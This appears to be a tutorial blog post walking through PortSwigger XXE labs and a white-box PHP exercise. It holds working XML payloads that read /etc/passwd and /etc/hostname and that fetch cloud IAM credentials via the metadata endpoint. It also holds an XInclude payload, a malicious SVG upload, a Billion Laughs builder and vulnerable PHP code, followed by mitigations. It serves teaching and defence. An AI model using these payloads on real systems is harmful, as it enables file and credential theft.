XML External Entities (XXE): Exploiting XML Parsers

mccleod1290

Introduction to XXE: Understanding and Exploiting XML External Entity Vulnerabilities

XML External Entity (XXE) injection is a powerful vulnerability that exploits misconfigured XML processors. When a vulnerable parser is allowed to resolve external entities, attackers can read sensitive files, make the server issue requests on their behalf, and even trigger denial-of-service attacks. This lab teaches the basic principles of internal and external entities in XML and how to exploit them to achieve file disclosure.

Understanding XML External Entity (XXE) Vulnerabilities

XML External Entity (XXE) vulnerabilities arise when an application's XML parser is configured insecurely or without restrictions. They let an attacker restructure the XML input to cause disclosure of sensitive information, server-side request forgery (SSRF), or even denial of service (DoS).

XML Fundamentals

XML (Extensible Markup Language):
XML is a markup language for encoding documents in a format that is both human-readable and machine-readable. Every XML document must be well-formed, a much stricter requirement than HTML imposes. An XML document almost always begins with an XML declaration:

  <?xml version="1.0" encoding="UTF-8"?>

XML Declaration:
This statement sets the XML version and encoding.

Document Type Definition (DTD)

DTD:
A DTD is a set of rules that defines the legal building blocks of an XML document. It describes the document structure and declares the allowed elements and attributes. A DTD can also define entities, which act like variables holding reusable values.

Example of a simple DTD declaring an internal entity:
```
  <!DOCTYPE note [
    <!ENTITY greeting "Hello, World!">
  ]>
  <note>
    <message>&greeting;</message>
  </note>
```
In this case, the internal entity greeting is defined as the string "Hello, World!" and then referenced as &greeting;.
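To see the substitution happen, here is a minimal sketch using Python's standard-library `xml.etree.ElementTree`, chosen only for illustration (the post does not tie this example to any particular parser). It parses the same note document and reads the message back, which now holds the entity's value rather than the reference.

```python
import xml.etree.ElementTree as ET

# The note document from above: an internal entity declared in the DTD's internal subset.
NOTE = """<!DOCTYPE note [
  <!ENTITY greeting "Hello, World!">
]>
<note>
  <message>&greeting;</message>
</note>"""

root = ET.fromstring(NOTE)
# By the time we read the tree, the parser has replaced &greeting; with its value.
print(root.find("message").text)  # Hello, World!
```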

Entities in XML

Internal Entities:
Internal entities are defined directly in the DTD and map to a literal value. They are used to avoid repeating strings and to keep values consistent.

<!ENTITY company "Example Corp">

When invoked (e.g. &company;), the parser replaces it with the exact string “Example Corp”.

External Entities:
External entities are declared using the SYSTEM or PUBLIC keyword and reference data from an external resource identified by a URI. For instance:

  <!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <data>&xxe;</data>

Here, the entity xxe pulls in data from /etc/passwd. The URI in an external entity declaration is called the system identifier, which names the location of the external content.
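Whether &xxe; is actually resolved depends entirely on the parser and its configuration. As an illustration (an assumption: Python's standard library, not the backends used in the labs below), `xml.etree.ElementTree` does not fetch external entities; according to the Python documentation it raises a `ParseError` when one is referenced. The sketch feeds it the payload above:

```python
import xml.etree.ElementTree as ET

# The external-entity document from above.
PAYLOAD = """<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""


def try_parse(document: str) -> str:
    """Return the parsed root text, or a note that the parser refused the document."""
    try:
        return ET.fromstring(document).text or ""
    except ET.ParseError as err:
        # ElementTree does not resolve external entities; the reference is reported as an error.
        return f"rejected: {err}"


print(try_parse(PAYLOAD))
```

A parser that does resolve external entities would instead return the contents of /etc/passwd here, which is exactly the behaviour the labs exploit.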

Parameter Entities:
These entities are used within DTDs, for example to build other declarations. They are declared and referenced with a % sign and can only be used inside the DTD. In the internal subset, a parameter-entity reference may only appear between declarations, not inside one, so a well-formed example looks like this:

  <!DOCTYPE config [
    <!ENTITY % common "<!ENTITY fullConfig 'CommonConfigValue - Extended'>">
    %common;
  ]>
  <config>&fullConfig;</config>

Parameter entities make DTDs more dynamic and modular, but they also increase the attack surface when misused.

How XXE Works

When an XML parser processes a document, it replaces each entity reference with its value. If an attacker supplies a malicious DTD with an external entity that points to a sensitive file or an attacker-controlled URL, the parser inadvertently inserts that data into its output or performs unintended network requests. This leads to data disclosure and SSRF, and to a DoS condition when the parser tries to expand a huge amount of data, as in the Billion Laughs attack.
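The Billion Laughs attack needs no external resources at all: it nests internal entities so that each level references the previous one ten times. The sketch below (Python, with hypothetical helper names) only builds the document and computes the expanded size arithmetically; it deliberately never parses the payload, because expanding it is the attack. Nine levels of tenfold fan-out give 10^9 copies of "lol", about 3 GB of text from an input under 1 KB.

```python
def billion_laughs(levels: int = 9, fanout: int = 10) -> str:
    """Build a Billion Laughs document: lolN references lol(N-1) `fanout` times."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for level in range(1, levels + 1):
        name = f"lol{level}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY {name} "{refs}">')
        prev = name
    subset = "\n  ".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n  {subset}\n]>\n<lolz>&{prev};</lolz>'


def expanded_length(levels: int = 9, fanout: int = 10, leaf: str = "lol") -> int:
    """Characters produced by fully expanding the top entity, computed without parsing."""
    # lol1 holds fanout copies of "lol", lol2 holds fanout**2, ..., lolN holds fanout**N.
    return len(leaf) * fanout ** levels


document = billion_laughs()
print(len(document), "characters of input")
print(expanded_length(), "characters after expansion")  # 3000000000
```

Recent expat releases ship amplification limits against exactly this pattern, but older or misconfigured parsers will try to build the full 3 GB string in memory.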

Core Concepts and XML Structure

XML Structure:
XML bodies in POST requests should always be inspected. Look for any place where you can add DTD content that declares your own custom entities.
Document Type Definitions (DTDs):
DTDs specify the structure of the XML document including entity declarations. Two primary types exist:
Internal Entities: Declared inside the XML document itself, using syntax such as:

<!ENTITY gar "example value">

Internal entities behave like constants: their value is fixed in the declaration and confined to the document's own content.

External Entities: External entities can be referenced using the SYSTEM keyword and the resource can be specified via a URI such as file:// or http://. For example:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

External entities make the parser fetch and include content from an external source named in the document.

Black Box Testing

Lab 1: Exploiting XXE using external entities to retrieve files

Lab URL - https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

Step 1: Intercept the XML Request:

This step is app exploration: click every single button. When we view a product and click "Check stock", the app sends a POST request, and looking at it, the server seems to parse XML. Let's start tinkering with this request.

Step 2. Inject the Malicious DTD:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Step 3: Calling back the entity and formatting our XML syntax

Since productId is reflected in the response, let's reference our entity there. Our final payload should look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>

With this modified payload the lab is solved. Note that if you omit the trailing ; in &xxe;, the XML parser throws an error.
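If you prefer scripting to Burp Repeater, the request can be reproduced with Python's standard library. This is a sketch under assumptions: `LAB_HOST` is a placeholder for your own lab instance, and the `/product/stock` path and `application/xml` content type are assumed from the stock-check requests in these labs. The block only builds the request. It also checks the semicolon point with a harmless internal entity, because the standard-library parser refuses external ones.

```python
import urllib.request
import xml.etree.ElementTree as ET

# Placeholder: replace with your own lab instance's hostname.
LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"


def build_stock_check(entity_uri: str, store_id: int = 1) -> bytes:
    """Stock-check body that declares &xxe; and reflects it through <productId>."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{entity_uri}"> ]>\n'
        f"<stockCheck><productId>&xxe;</productId><storeId>{store_id}</storeId></stockCheck>"
    )
    return xml.encode("utf-8")


def build_request(entity_uri: str) -> urllib.request.Request:
    # Assumption: the stock check is POSTed to /product/stock as application/xml.
    return urllib.request.Request(
        f"https://{LAB_HOST}/product/stock",
        data=build_stock_check(entity_uri),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def is_well_formed(document: str) -> bool:
    """True if ElementTree accepts the document."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


# A harmless internal entity, with and without the closing ';'.
WITH_SEMICOLON = '<!DOCTYPE t [<!ENTITY x "v">]><t>&x;</t>'
WITHOUT_SEMICOLON = '<!DOCTYPE t [<!ENTITY x "v">]><t>&x</t>'
```

To send it, pass the request to `urllib.request.urlopen`. If the server answers with an error status (like the 400 shown in the next lab), `urlopen` raises `urllib.error.HTTPError`, and the reflected data can be read from the exception with `.read()`.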

Lab 2: Exploiting XXE to perform SSRF attacks

This lab is very simple. In the previous lab we used the file:// protocol; this time we use http:// to access internal data. Since the lab mimics an AWS environment, we target the EC2 instance metadata address, 169.254.169.254. We follow the same steps up to Step 2, where we modify our payload a bit.

Step 2: Our payload should look something like the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

We get an error, but don't worry: the error message leaks the name of the next directory we should request.

Our response would look something like the following:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 28

"Invalid product ID: latest"

Once we add latest to the path, our modified payload looks like this:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest"> ]>

Step 3: Keep modifying the payload until we reach the credentials.

Our final payload should look like the following. The response contains our SecretAccessKey in JSON format.

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

Don't forget to reference our entity in the body. Our final HTTP request body should look something like this, and with it the lab is solved.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
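The trial-and-error loop from Step 3 can be automated: each error message leaks the next path segment, so we append it and resend until a JSON document comes back. In this sketch, `send` is a hypothetical callable that posts the payload and returns the raw response body. It assumes the error always has the form "Invalid product ID: <value>" and simply follows the first entry when a listing contains several.

```python
import json
from typing import Callable, Tuple

METADATA_ROOT = "http://169.254.169.254/"
ERROR_PREFIX = "Invalid product ID: "


def build_payload(uri: str) -> str:
    """Stock-check body whose productId reflects the entity pointing at `uri`."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{uri}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


def walk_metadata(send: Callable[[str], str], max_depth: int = 10) -> Tuple[str, str]:
    """Follow the path segment leaked by each error until a JSON document appears.

    `send` is a hypothetical callable: it POSTs the payload and returns the raw
    response body, for example '"Invalid product ID: latest"'.
    """
    uri = METADATA_ROOT
    for _ in range(max_depth):
        message = json.loads(send(build_payload(uri)))  # the body is a JSON string
        leaked = message[len(ERROR_PREFIX):] if message.startswith(ERROR_PREFIX) else message
        if leaked.lstrip().startswith("{"):
            return uri, leaked  # reached a JSON document, e.g. the IAM credentials
        entries = leaked.split()
        if not entries:
            raise RuntimeError(f"nothing leaked at {uri}")
        uri = uri.rstrip("/") + "/" + entries[0]  # descend into the first listed entry
    raise RuntimeError("gave up after max_depth requests")
```

Passing `send` in as a function keeps the path-walking logic separate from the HTTP details, so it can be exercised against recorded responses before pointing it at the lab.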

Lab 3: Exploiting XInclude to retrieve files

Lab URL - https://portswigger.net/web-security/xxe/lab-xinclude-attack

When to Use XInclude

In situations where standard XXE payloads are blocked by restrictions on entity declarations, or where the application embeds our input into only part of a server-side XML document, XInclude provides an alternative attack surface. Because an XInclude directive can be placed inside an XML fragment that cannot carry a full DOCTYPE declaration, it still lets you trigger file retrieval on backend systems.

App Exploration:

We view a product in the shop and click the "Check stock" option. As before we see a POST request, but this time there is no XML in the request.

We send this request to Repeater to add our payload. Before that, we tried converting the request into JSON and XML, but neither worked. We also tried referencing entities, but they did not seem to be enabled, presumably for security reasons.

The Payload Breakdown

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Our final http request should look something like the following:

POST /product/stock HTTP/2
Host: 0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Cookie: session=sIgSNWBNsJdoh5f2ez8rhpRnlbUCmAGO
Content-Length: 128
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Origin: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=
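Burp sends the body above exactly as typed. That works here because the payload contains no &, = or +, but when a payload does contain them it is safer to URL-encode it. A minimal sketch using Python's `urllib.parse` (the field names come from the request above; the helper name is hypothetical):

```python
from urllib.parse import parse_qs, urlencode

# The XInclude fragment from the payload breakdown above.
XINCLUDE = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)


def build_form_body(product_id: str, store_id: str = "") -> str:
    """URL-encode the stock-check form fields (productId, storeId)."""
    return urlencode({"productId": product_id, "storeId": store_id})


body = build_form_body(XINCLUDE)
print(body)
# The server's form decoder recovers the raw fragment from the encoded body.
print(parse_qs(body, keep_blank_values=True)["productId"][0])
```

The encoded string goes in as the request body, with Content-Type: application/x-www-form-urlencoded as in the original request.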

Key Components

Root Element <foo>: A basic container element that only provides structure for our payload and does not need to conform to any particular schema.

XInclude Namespace Declaration:

  xmlns:xi="http://www.w3.org/2001/XInclude"

This binds the xi prefix to the official XInclude namespace, so from then on an XInclude-aware XML processor treats xi:include as an inclusion directive.

XInclude Element: The core of our exploit:
- href="file:///etc/passwd": Specifies the target file we want to retrieve from the server's local filesystem
- parse="text": Essential attribute that tells the processor to treat the included content as raw text instead of XML, avoiding parsing errors since /etc/passwd is not valid XML

Why This Works

Bypasses Traditional XXE Protections: XInclude is resolved by the XML processor's inclusion step rather than through DTD entity declarations, so defenses that only block DOCTYPEs or external entities do not stop it.
Works in Partial XML Contexts: It also works when the application only handles XML snippets or does not let us control the DOCTYPE.

Lab 4: Exploiting XXE via image file upload

The Vulnerability

SVG files are native XML, so they become vectors for XML External Entity (XXE) attacks when file uploads are not properly defended. This post explains how a malicious payload in an SVG avatar can exploit the server.

The Payload Explained

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
<svg width="128px" height="128px"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Save this payload as an .svg file and upload it in the avatar section using the "Choose file" option.

Once it is uploaded, go to your comment on the blog and view the image you uploaded. The image should display the hostname. Submit the hostname as the answer, and with this the lab is solved.
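Rather than editing the file by hand for each target, a small Python sketch can generate it. `make_svg_payload`, `save_payload` and the default file name `avatar.svg` are hypothetical; the markup is the payload above, with the entity's URI made configurable.

```python
def make_svg_payload(target: str = "file:///etc/hostname") -> str:
    """Return the avatar SVG from above with a configurable external-entity URI."""
    return f"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "{target}" >
]>
<svg width="128px" height="128px"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
"""


def save_payload(path: str = "avatar.svg", target: str = "file:///etc/hostname") -> None:
    """Write the payload to disk, ready for the avatar "Choose file" upload."""
    with open(path, "w", encoding="utf-8") as handle:
        handle.write(make_svg_payload(target))
```

Calling `save_payload()` writes avatar.svg in the current directory; short, single-line files such as /etc/hostname suit this vector best, since the result has to fit in a 128px image.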

Breaking Down the Components

XML Declaration: <?xml version="1.0" standalone="yes"?> declares the XML version and marks the document as standalone, meaning it does not rely on markup declarations from an external DTD. It does not stop the parser from resolving the external entity declared in the internal subset below.

DOCTYPE Declaration: Essential part that declares our exploit:

  <!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/hostname" >
  ]>

This tells the XML parser to fetch the contents of /etc/hostname from the server's filesystem and substitute them for every &xxe; reference.

SVG Structure and Namespaces:
- xmlns="http://www.w3.org/2000/svg" declares the default SVG namespace
- xmlns:xlink="http://www.w3.org/1999/xlink" declares the xlink namespace; it is not used directly by our exploit, but it keeps the file looking like a conventional SVG so it is processed normally

The Attack Vector: <text font-size="16" x="0" y="16">&xxe;</text> contains the entity reference that will be replaced with the server's hostname when parsed

Why This Works

SVG as an XML Trojan horse: SVG images are XML-based but are typically treated as image content, so they can slip past content filters while carrying an XML attack payload.
Misconfigured XML parsers: If the server's XML parser is allowed to load external entities (usually a mistake), it will read the referenced external file.
Information disclosure: After processing, the hostname is rendered as text in the SVG "image", exfiltrating information from the server through the vulnerability.

White Box Testing

Source Code Analysis:

(Location: OrderController.php in the controllers folder → order() method)

Here’s the problematic code handling XML input:

else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')  
{  
    $order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);  
    if (!$order->food) return 'You need to select a food option first';  
    return "Your ($order->food) order has been submitted successfully.";  
}

The code is vulnerable to XXE for the following reasons:

1. The vulnerability is in the flags: `LIBXML_NOENT`

The simplexml_load_string() call passes the LIBXML_NOENT flag, which tells libxml2 to substitute entity references with their values. For example, with <!ENTITY company "Example Corp"> declared, &company; becomes Example Corp. Combined with external entities, this becomes ammunition:

<!DOCTYPE root [  
    <!ENTITY xxe SYSTEM "file:///etc/passwd">  
]>  
<order><food>&xxe;</food></order>

Here &xxe; is replaced with the contents of /etc/passwd because of LIBXML_NOENT.

2. No Entity Loader Restrictions

The code does not disable PHP's external entity loader. On PHP 7, unless libxml_disable_entity_loader(true) is called, the parser is allowed to fetch external resources (such as files or URLs), and together with LIBXML_NOENT this lets attackers read arbitrary files.

3. No Input Validation

The application blindly trusts any XML input. There is no validation to guard against risky constructs such as <!DOCTYPE> or <!ENTITY>.
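One defensive check that would have stopped this request is to reject any document carrying a DOCTYPE before it reaches the real parser. The sketch below illustrates the idea in Python rather than PHP, to keep one language across this post's examples; `ForbiddenDTD`, `reject_dtd` and `parse_order` are hypothetical names. It uses expat's `StartDoctypeDeclHandler`, so the check happens during parsing rather than by string matching, and it complements the parser fixes in the Mitigation section rather than replacing them.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class ForbiddenDTD(ValueError):
    """Raised when an incoming XML document carries a DOCTYPE declaration."""


def reject_dtd(data: str) -> None:
    """Pre-scan the document with expat and refuse any DOCTYPE."""
    scanner = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside an expat handler aborts the parse and propagates to the caller.
        raise ForbiddenDTD(f"DOCTYPE {name!r} is not allowed")

    scanner.StartDoctypeDeclHandler = on_doctype
    scanner.Parse(data, True)


def parse_order(data: str) -> ET.Element:
    """Hypothetical order parser that only accepts DTD-free documents."""
    reject_dtd(data)
    return ET.fromstring(data)
```

A plain order such as <order><table_num>1</table_num><food>pizza</food></order> passes through unchanged, while the payloads in the Exploitation section below are refused as soon as their DOCTYPE is seen.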

Exploitation:

First Attempt:

We explore the application and notice that it sends data as JSON. So let's look up a quick XXE payload to grab the flag. After a few small tweaks, we end up with the following.

Final payload:

<?xm:l version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'file://flag'>]>
<order><food>&test;</food></order>

But our server responds with the following error message:

{"status":"danger","message":"You need to select a food option first"}

Second Attempt:

Even after changing the JSON data to XML, the web application returns a 400 error. We converted the request with a content-type converter plugin, but it turns out the header must be exactly Content-Type: application/xml, not Content-Type: application/xml;charset=UTF-8: the order() method compares it with strict equality (===). Our handy plugin appends ;charset=UTF-8, so the request never reaches the XML branch.

Even with the correct content type, we still get the following error. Maybe it has something to do with the tags.

You need to select a food option first

Third attempt :

I got this payload from a walkthrough and realised my mistake: I had not turned the JSON fields (such as table_num and food) into XML tags. The application seems to accept only input with that exact structure. Our final payload looks something like this:

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///flag"> ]>
<order>
  <table_num>1</table_num>
 <food>&ent;</food>
</order>

With this we successfully get our flag.

Mitigation

Step 1: Remove `LIBXML_NOENT`

This flag is not needed for many use cases and directly enables entity substitution.

Step 2: Disable External Entities

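Add this line before the XML parser is invoked. It applies to PHP versions before 8.0: the function is deprecated as of PHP 8.0, where external entity loading is disabled by default unless LIBXML_NOENT is passed.

libxml_disable_entity_loader(true); // Block external entities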

Step 3: Use Safe Parsing Flags

Replace LIBXML_NOENT with LIBXML_NONET to block network access:

$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);

Corrected Code snippet

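else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')
{
    // PHP < 8.0 only: deprecated in 8.0, where external entity loading is off by default
    libxml_disable_entity_loader(true); // 🔒 CRITICAL FIX
    // No LIBXML_NOENT, so entities are not substituted; LIBXML_NONET blocks network fetches
    $order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
    if ($order === false || !$order->food) return 'Please choose a food first';
    return "Your ($order->food) order has been submitted successfully.";
}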

We made the following changes to our code:

libxml_disable_entity_loader(true)
- Disables PHP's ability to load external entities. Even if an attacker injects <!ENTITY>, the parser can't resolve it.
LIBXML_NONET
- Prevents the parser from accessing the network (e.g. http://internal-server).
No Entity Substitution
- Without LIBXML_NOENT, &xxe; is not substituted with the file contents.

Note to readers: While this fix looks very appealing, in practice the whole backend broke when we rebuilt the web application with Docker, because the Alpine edge repository no longer provides PHP 7.

Conclusion: Securing the XML Gateway

XXE vulnerabilities expose a critical flaw in how applications trust and process XML input, one that anyone with malicious intent can abuse. They serve as a reminder that even structured data can be weaponized. From stealing sensitive files to triggering SSRF attacks, XXE demonstrates how a single misconfigured parser can become a gateway for catastrophic breaches.

Key Takeaways:

Parse XML with caution: XML parsers should ship hardened. Disable external entities, disable external DTDs (or at least restrict them), and validate inputs carefully.
Beyond the Obvious: XXE isn't just about file:// URIs. Techniques like XInclude and SVG payloads show that attackers get creative when the obvious route is blocked.
The Mitigation Myth: In 2025, AI tools make it easy to spot errors and suggest fixes, but most production code has many dependencies and may be deployed on Docker images that quickly become outdated. In practice, even with the right fix, we might not be able to run the web application. In our case, the Dockerfile failed because the Alpine edge repository no longer provides PHP 7.

🔐 The secure path forward? Presume every XML document is a threat – until proven otherwise.